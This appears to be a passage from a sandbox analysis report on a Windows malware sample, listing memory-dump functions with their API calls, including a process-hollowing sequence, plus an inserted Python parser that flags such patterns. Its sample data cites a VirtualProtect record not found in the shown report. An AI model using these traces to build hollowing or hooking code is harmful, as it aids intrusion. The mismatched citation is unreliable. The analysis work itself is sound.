    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 25
  • API ID: HeapFreeRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionmemcpy
  • String ID:
  • API String ID: 229461383-0
  • Opcode ID: bbc3c6a859906d8649009038d034178e5739454c1ef541e28150f978055748ba
  • Instruction ID: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
  • Opcode Fuzzy Hash: EDE06870284402D5901B6489BC4AA32FA0BFA813CADCD411BDD613924D3AC305A57B18
  • Instruction Fuzzy Hash: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
  • memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001CAE7F: lstrcmpi.KERNEL32(?,001EC4EA), ref: 001CAED6
    • Part of subcall function 001CAE7F: HeapFree.KERNEL32(00000000,00000000,001C5C01), ref: 001CAF03
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
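Added example (not part of the Joe Sandbox report or of Joe Sandbox's own tooling): a small Python parser for the function records in this similarity report. It turns the "Memory Dump Source / Similarity / APIs" blocks above into per-function API call lists, keeping the "Part of subcall function" entries with their callee address, and flags the two call shapes a triager would pull out of this dump: the ResumeThread / WaitForSingleObject / SuspendThread sequence at 001DC2CA-001DC2EB whose subcall 001DBD3F reaches NtUnmapViewOfSection, which is the shape of process hollowing, and the VirtualProtect calls under 001D7A61 whose flNewProtect is 00000040 (PAGE_EXECUTE_READWRITE), which is the shape of an inline hook being written into code. The sample input is constructed by copying and trimming two records from above; the pattern names, the API sets behind them and the argument position checked are this example's own assumptions, not Joe Sandbox signatures.

```python
# Added example (not part of the Joe Sandbox report or of Joe Sandbox itself):
# parse the "Memory Dump Source / Similarity / APIs" records shown above and
# flag API combinations that match a few triage patterns of this example's own.
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed input: two records copied from the report above, trimmed.
SAMPLE_REPORT = """\
Memory Dump Source
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
APIs
  • memset.NTDLL ref: 001DC240
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
Memory Dump Source
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
APIs
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000), ref: 001D7B52
"""

FIELD_LINE = re.compile(r"^\s*[•*-]?\s*(Total matches|API ID):\s*(.*)$")
API_LINE = re.compile(
    r"^\s*[•*-]?\s*(?:Part of subcall function (?P<callee>[0-9A-F]+): )?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)")

@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]         # argument values as printed; "?" means unresolved
    ref: str                # address of the call site
    callee: Optional[str]   # subcall function address, None for a direct call

@dataclass
class FunctionRecord:
    api_id: str = ""
    total_matches: int = 0
    calls: List[ApiCall] = field(default_factory=list)

def parse_records(text: str) -> List[FunctionRecord]:
    """One FunctionRecord per 'Memory Dump Source' block; unrecognised lines are skipped."""
    records, cur = [], None
    for line in text.splitlines():
        if line.strip() == "Memory Dump Source":
            cur = FunctionRecord()
            records.append(cur)
        elif cur is not None and (m := FIELD_LINE.match(line)):
            if m.group(1) == "Total matches":
                cur.total_matches = int(m.group(2).strip())
            else:
                cur.api_id = m.group(2).strip()
        elif cur is not None and (m := API_LINE.match(line)):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append(ApiCall(m["api"], m["module"], args, m["ref"], m["callee"]))
    return records

# Triage heuristics: this example's own API sets, not Joe Sandbox signatures.
PATTERNS = {
    "process_hollowing": {"NtUnmapViewOfSection", "ResumeThread", "SuspendThread"},
    "low_integrity_drop": {"CreateDirectoryA", "GetTempFileNameA"},
}
PAGE_EXECUTE_READWRITE = 0x40

def rwx_virtualprotect(rec: FunctionRecord) -> List[ApiCall]:
    """VirtualProtect calls whose flNewProtect (3rd argument) is PAGE_EXECUTE_READWRITE."""
    hits = []
    for c in rec.calls:
        if c.api == "VirtualProtect" and len(c.args) >= 3:
            try:
                if int(c.args[2], 16) == PAGE_EXECUTE_READWRITE:
                    hits.append(c)
            except ValueError:  # "?" or another non-hex placeholder
                pass
    return hits

def triage(rec: FunctionRecord) -> List[str]:
    names = {c.api for c in rec.calls}
    findings = [label for label, needed in PATTERNS.items() if needed <= names]
    if rwx_virtualprotect(rec):
        findings.append("virtualprotect_rwx")
    return findings

if __name__ == "__main__":
    for r in sorted(parse_records(SAMPLE_REPORT), key=lambda r: -r.total_matches):
        print(f"{r.total_matches:4d}  {r.api_id:<55} {', '.join(triage(r)) or '-'}")
```

Run as a script it prints each record, most-matched first, with its findings; pasting the full text of this section in place of the sample covers every record on the page. Arguments printed as "?" are values the sandbox could not resolve, so an argument-based check such as the PAGE_EXECUTE_READWRITE one can confirm a hit but never rule one out; the API-set patterns do not depend on argument values.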
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 29
  • API ID: HeapFreeRegisterWaitForSingleObjectRtlAllocateHeapmemcpy
  • String ID:
  • API String ID: 1976740423-0
  • Opcode ID: 00e719380342739fce2d9a83077352ae1e8e636be9c83fb6a114a482fd48beda
  • Instruction ID: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
  • Opcode Fuzzy Hash: 8CF059B0118943C9E83B20D21991BBEAB423F935CBC0E4631E40308A4F1E4762B63A98
  • Instruction Fuzzy Hash: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C665D
  • memcpy.NTDLL(00000018,?,?), ref: 001C6686
  • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_00005549,00000000,000000FF,00000008), ref: 001C66C5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C66D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
